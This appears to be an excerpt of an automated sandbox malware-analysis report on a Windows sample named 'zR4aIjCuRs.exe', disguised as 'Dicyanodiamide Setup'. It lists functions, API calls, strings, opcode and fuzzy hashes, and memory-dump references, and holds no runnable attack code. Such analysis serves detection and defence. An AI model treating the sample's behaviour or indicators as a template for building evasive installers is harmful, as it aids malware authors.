Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: fe831e2aae84e219dea269f70c896ea3d406de4a870458ebbf780fe83d31e9a4
Instruction ID: 9073c6adce58ff193a4fc3832a7f1d33e0b572ffc6e746f3319226a0f770ccba
Opcode Fuzzy Hash: fe831e2aae84e219dea269f70c896ea3d406de4a870458ebbf780fe83d31e9a4
Instruction Fuzzy Hash: 24F0F0329090219BDB20FBA189885DE72A49F44318B2441BBF902B20D1CBBC0E409A6E

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 0bc635984c6f466b42bf69b1192a92afab3c6d6232f2671ab24b9074207b237f
Instruction ID: 4fc8e819a9ec015efa4fb87cb4f3efb4dacce27a9684fd7b71b6c066277d8bf2
Opcode Fuzzy Hash: 0bc635984c6f466b42bf69b1192a92afab3c6d6232f2671ab24b9074207b237f
Instruction Fuzzy Hash: 19D0A773F142008BD710DBB8BE8949E73E8E780329330883BE102F10D1E978D8424E2C

Non-executed Functions

Function 00404C9E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404CB6
GetDlgItem.USER32(?,00000408), ref: 00404CC1
GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
LoadBitmapW.USER32(0000006E), ref: 00404D1E
SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
DeleteObject.GDI32(00000000), ref: 00404D94
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
ShowWindow.USER32(?,00000005), ref: 00404EEE
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
ImageList_Destroy.COMCTL32(?), ref: 004050BE
GlobalFree.KERNEL32(?), ref: 004050CE
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
ShowWindow.USER32(?,00000000), ref: 0040526D
GetDlgItem.USER32(?,000003FE), ref: 00405278
ShowWindow.USER32(00000000), ref: 0040527F

Strings

M, xrefs: 00404E48
, xrefs: 00405257
N, xrefs: 00404F29

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
Opcode Fuzzy Hash: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58

Function 004059CC Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,753B3420,00000000), ref: 004059F5
lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,753B3420,00000000), ref: 00405A3D
lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,753B3420,00000000), ref: 00405A60
lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,753B3420,00000000), ref: 00405A66
FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,753B3420,00000000), ref: 00405A76
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
FindClose.KERNEL32(00000000), ref: 00405B25

Strings

"C:\Users\user\Desktop\zR4aIjCuRs.exe", xrefs: 004059CC
C:\Users\user\AppData\Local\Temp\, xrefs: 004059DA
\*.*, xrefs: 00405A37

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\zR4aIjCuRs.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-474606463
Opcode ID: bcbc2a7ac1b1f3fb7d07acde4e2512b3450779b38a1d7279aa7c3219c953243e
Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
Opcode Fuzzy Hash: bcbc2a7ac1b1f3fb7d07acde4e2512b3450779b38a1d7279aa7c3219c953243e
Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E

Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183

Strings

C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges, xrefs: 004021C3

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges
API String ID: 542301482-3897678559
Opcode ID: e60a4f12c6f1b09632b0029568e31388158c347d8d225f2ce6bc6dcfc08c0e49
Instruction ID: d410e27007f87fae541732bdb1cbefdb239a2090c9e466904aadd755c5c79360
Opcode Fuzzy Hash: e60a4f12c6f1b09632b0029568e31388158c347d8d225f2ce6bc6dcfc08c0e49
Instruction Fuzzy Hash: 0D413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54

Function 004072EC Relevance: 2.8, Strings: 2, Instructions: 300COMMON

Download Yara Rule

Strings

p!C, xrefs: 00407520
p!C, xrefs: 0040743C, 0040745E, 0040750E, 004074E0, 00407463

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID:
String ID: p!C$p!C
API String ID: 0-3125587631
Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
Instruction ID: 7c26ffe8835462b5285d43e9ad3b72979f058f3642fe5300250d3649f4ae0bba
Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
Instruction Fuzzy Hash: 9BC15831E04219DBDF18CF68C8905EEBBB2BF88314F25866AC85677380D734A942CF95

Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: d976f7a25d9b6cda02430a9c4c43dcf534a7d9685ff1e4a5993e34d41637e130
Instruction ID: 0cd4a400be5c1b2ce6ea5bbb35e8853c3f48bcc8ff45a2cab7902aaadd26400c
Opcode Fuzzy Hash: d976f7a25d9b6cda02430a9c4c43dcf534a7d9685ff1e4a5993e34d41637e130
Instruction Fuzzy Hash: C8F08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D409B29

Function 00406B15 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
Instruction ID: dcc2b246e3e85771245330633344c28aad3b6f2e7effc766acd5add5c88cb85a
Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
Instruction Fuzzy Hash: DBE18A7190470ADFDB24CF99C880BAAB7F5FF44305F15852EE497A7291E378AA91CB04

Function 004043F0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
GetDlgItem.USER32(?,000003E8), ref: 004044A2
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
GetSysColor.USER32(?), ref: 004044D0
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
lstrlenW.KERNEL32(?), ref: 004044F1
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
GetDlgItem.USER32(?,0000040A), ref: 0040456C
SendMessageW.USER32(00000000), ref: 00404573
GetDlgItem.USER32(?,000003E8), ref: 0040459E
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
SetCursor.USER32(00000000), ref: 004045F2
LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
SetCursor.USER32(00000000), ref: 0040460E
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F

Strings

gC@, xrefs: 004045FA
Space available: , xrefs: 004045CD
N, xrefs: 0040458C

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N$Space available: $gC@
API String ID: 3103080414-143380558
Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,Dicyanodiamide Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
Dicyanodiamide Setup, xrefs: 00401150

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
